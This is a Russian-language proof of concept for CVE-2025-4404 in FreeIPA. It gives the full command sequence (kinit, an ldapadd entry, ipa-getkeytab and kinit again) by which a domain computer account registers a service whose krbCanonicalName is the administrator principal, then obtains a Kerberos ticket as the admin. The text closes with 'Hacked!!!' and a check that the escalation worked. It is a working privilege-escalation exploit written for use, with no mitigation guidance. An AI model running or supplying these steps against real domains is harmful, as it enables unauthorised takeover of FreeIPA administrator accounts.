
PoC для CVE-2025-4404
POC для CVE-2025-4404
Если у вас есть доменная учетная запись компьютера (host/pc1.[email protected]), то по умолчанию вы можете добавить службу. Также вы можете задать krbPrincipalName и krbCanonicalName. По умолчанию значение атрибута krbCanonicalName отсутствует для учетной записи администратора FreeIPA 4.12.4. Вы можете запросить билет Kerberos со значением krbPrincipalName, но билет будет содержать значение krbCanonicalName.
Поехали
Сначала запросим билет от имени учетной записи компьютера:
$ kinit host/[email protected] -k -t /etc/krb5.keytab
Добавьте сервисную учетную запись в LDAP:
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
$ kinit --no-request-pac -k -t ./test.keytab test/[email protected]Взломано!!!
Проверить билет можно с помощью:
ldapwhoami -H ldap://dc1.test.local